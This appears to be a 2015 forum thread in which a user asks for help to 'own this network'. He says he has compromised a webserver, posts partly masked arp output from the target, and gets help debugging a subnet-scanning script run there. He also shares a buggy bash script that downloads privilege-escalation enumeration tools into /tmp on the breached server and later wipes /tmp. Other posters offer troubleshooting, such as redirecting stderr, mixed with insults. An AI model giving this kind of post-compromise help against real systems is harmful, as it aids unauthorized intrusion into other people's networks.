User Controls
Ok guys help me own this network.
-
2015-11-15 at 1:18 AM UTCYou're trying to execute across zones. You can't do that.
-
2015-11-15 at 3:42 AM UTC
You're trying to execute across zones. You can't do that.
What exactly is a "zone" speccy? -
2015-11-15 at 3:49 AM UTC
What exactly is a "zone" speccy?
It's a perimeter network. -
2015-11-15 at 5:03 AM UTC
It's a perimeter network.
OK, so if trying to execute commands across "zones" isn't allowed then why can soph execute other things on the remote machine, such as cat-ing a file? -
2015-11-15 at 5:07 AM UTC
OK, so if trying to execute commands across "zones" isn't allowed then why can soph execute other things on the remote machine, such as cat-ing a file?
Some you can, and some you can't.
-
2015-11-15 at 5:52 AM UTC
Some you can, and some you can't.
So which ones can you and which can't you? Why is there a distinction? -
2015-11-15 at 11:58 AM UTC
So which ones can you and which can't you? Why is there a distinction?
Come now Spectral can't keep Lanny hanging like this. -
2015-11-15 at 1:57 PM UTCYou guys are Funbunchers. Can't help you too, too much. It wouldn't look right.
-
2015-11-15 at 3:15 PM UTC
You guys are Funbunchers. Can't help you too, too much. It wouldn't look right.
In other words you don't know what you are talking about, gotcha'. -
2015-11-16 at 5:54 PM UTCSo, Sophie... tell me, why didn't your script provide any return? You apparently have all the answers and should know by now, so please share your extensive knowledge on the subject with us.
-
2015-11-16 at 6:19 PM UTC
So, Sophie… tell me, why didn't your script provide any return? You apparently have all the answers and should know by now, so please share your extensive knowledge on the subject with us.
Confronted with the realization he can't keep bullshitting ad infinitum, Spectral resorts to parroting the very question he was asked. It's obvious neither I nor Soph know an exact reason why he's not getting output but it's even more obvious that you don't either, the difference is some of use are trying to troubleshoot while you're acting high and mighty trying to score some epeen points by spouting platitudes that you back out of as soon as anyone presses you to stop being vague and misleading. -
2015-11-16 at 6:51 PM UTCCan I not talk about my sexual frustrations here guys? Is this not a safe space?
-
2015-11-16 at 8:20 PM UTC
So, you admit you don't have all the answers. Well, at least that's a start.
The difference being we never claimed we had the answer and like Lanny said we were troubleshooting while you were pretending to be the expert here Spectral. Clearly as has been shown time and time again you don't know shit now stop talking you're making yourself look even more ridiculous. -
2015-11-16 at 8:25 PM UTCAlso for the people capable of helping(That means you Lanny) It would appear perl scripts run and give output, what i am thinkng is that perhaps PyCat doesn't run because it makes use of the netaddr module which may not be installed on the server. Why it doesn't print an error message i still don't really know though, but when i was testing the perl script i was able to dump printed output to a txt file and was able to cat it properly, so it must be that something is up with the server's python install.
-
2015-11-16 at 11:56 PM UTCYou can't get return output across zones with that server.
-
2015-11-17 at 2:45 AM UTC
You can't get return output across zones with that server.
Ok i'm going to be honest and serious here with you spectral so i'd appreciate it if you'd do the same when replying. I know what you are trying to say so lets get that out of the way first. That being said 'zones' is an unfortunate term to use in the context of the scenario we're discussing. In general network zoning is done in example in a corperate environment, where each zone is on it's own subnet on the network. You might have a zone for employee terminals, one for the sysadmins and one for outward facing webservers to host whatever needs to be accesible from the internet. Now obviously there will be security measures in place to isolate these zones from eachother to whatever degree is approptiate.
However this is irrelevant to the scenario we are in currently, even if the network i am attacking were to be zoned i already compromised a webserver, this means that unless it's a VPS i now should be able to see anything on the subnet the server can or is connected to.
This brings me to my PyCat tool, PyCat has been made to be able to scan the subnet by sending out particular UDP datagrams and interpreting the response received to determine if there are any hosts up on the local network with which i can interact. I run my script to scan from the server i am on, this means the server i am on is going to give me my output regardless of anything else on the network.
Now if i do get outout if i run anything else on the server but not when i run my PyCat script this can either mean two things. It means A) their python doesn't work properly or B) there no other devices connected to the server i am on. And after running
arp -a
I can see however that there are three devices on the network i am on.
(217.170.15.1*) at 00:15:17:82:D7:40 [ether] on eth0
(217.170.15.12*) at 00:10:DB:DD:3A:03 [ether] on eth0
(217.170.15.*) at 00:15:17:82:D7:40 [ether] on eth0
So in conclusion, there is something wrong with their python install, or the user i am does not have the privilege to execute python scripts -
2015-11-17 at 3:02 AM UTCI was going to post you can redirecvt python output to a file then cat the file if you're worried about output being returned to you correctly, just noticed you already tried that though.
don't even worry about the zone nonsense, I suspect he's talking about network segments (specific subnets set up for different functions, ie servers on 192.168.1.0/24 and workstations on 192.168.2.0/24 with rules set so that only certain types of traffic between the two are allowed) but that's not relevant here because you've already established a connection. control and return data should be carried by the same tunnel, like with ssh as opposed to ftp. -
2015-11-17 at 3:13 AM UTC
I was going to post you can redirecvt python output to a file then cat the file if you're worried about output being returned to you correctly, just noticed you already tried that though.
don't even worry about the zone nonsense, I suspect he's talking about network segments (specific subnets set up for different functions, ie servers on 192.168.1.0/24 and workstations on 192.168.2.0/24 with rules set so that only certain types of traffic between the two are allowed) but that's not relevant here because you've already established a connection. control and return data should be carried by the same tunnel, like with ssh as opposed to ftp.
Yeah that's basically what i told spectral in my post above, also now that you're here aldra. I made a Bash script to get the scripts i want on servers such as these easily but i need to brush up on my bash actually i'd like to ask you to have a look at my code if it's not too much trouble. I posted it in the perl/shellscript thread too but since you're here i'll post it here for you as well
#!/bin/bash
DONE=$1
PATH="/tmp/"
if [ "$DONE" == "" ]
then
echo "Downloading and extracting scripts, when ready execute script with arg $1 to remove files after use"
`wget -O /tmp/file1.zip https://github.com/rebootuser/LinEnum/archive/master.zip`
`wget -O /tmp/file2.zip https://github.com/PenturaLabs/Linux_Exploit_Suggester/archive/master.zip`
`wget -O /tmp/file3.zip https://github.com/pentestmonkey/unix-privesc-check/archive/1_x.zip`
for zip in *.zip
do
dirname=`echo $zip | sed 's/\.zip$//'`
if mkdir $dirname
then
if cd $dirname
then
unzip ../$zip
cd ..
rm -f $zip
else
echo "Could not unpack $zip - cd failed"
fi
else
echo "Could not unpack $zip - mkdir failed"
fi
exit 1
else
echo ""Removing scripts""
find $PATH/* -exec rm {} \;
exit 2
fi
How does that look? That should download and unzip everything i want right and when i pass an arg delete it again? Correct? -
2015-11-17 at 4:46 AM UTC
…return data should be carried by the same tunnel…
keyword: should -
2015-11-17 at 5:49 AM UTCShut up spectal, you're so obviously clueless it hurts to read. I really really hope you're just been trolling us for years because the more I think about how frequently you lie about knowing things you don't the more it makes me cringe, to the point of pain, at how pathetic that would be.
Also for the people capable of helping(That means you Lanny) It would appear perl scripts run and give output, what i am thinkng is that perhaps PyCat doesn't run because it makes use of the netaddr module which may not be installed on the server. Why it doesn't print an error message i still don't really know though, but when i was testing the perl script i was able to dump printed output to a txt file and was able to cat it properly, so it must be that something is up with the server's python install.
Oh, oh, derping out here. Try `python PyCat.py &> foobar.txt`, the important part bering "&>". Regular redirection only works for stdout, if you have an immediate error or something it may be getting spit out on stderr which is why it wouldn't have shown up before.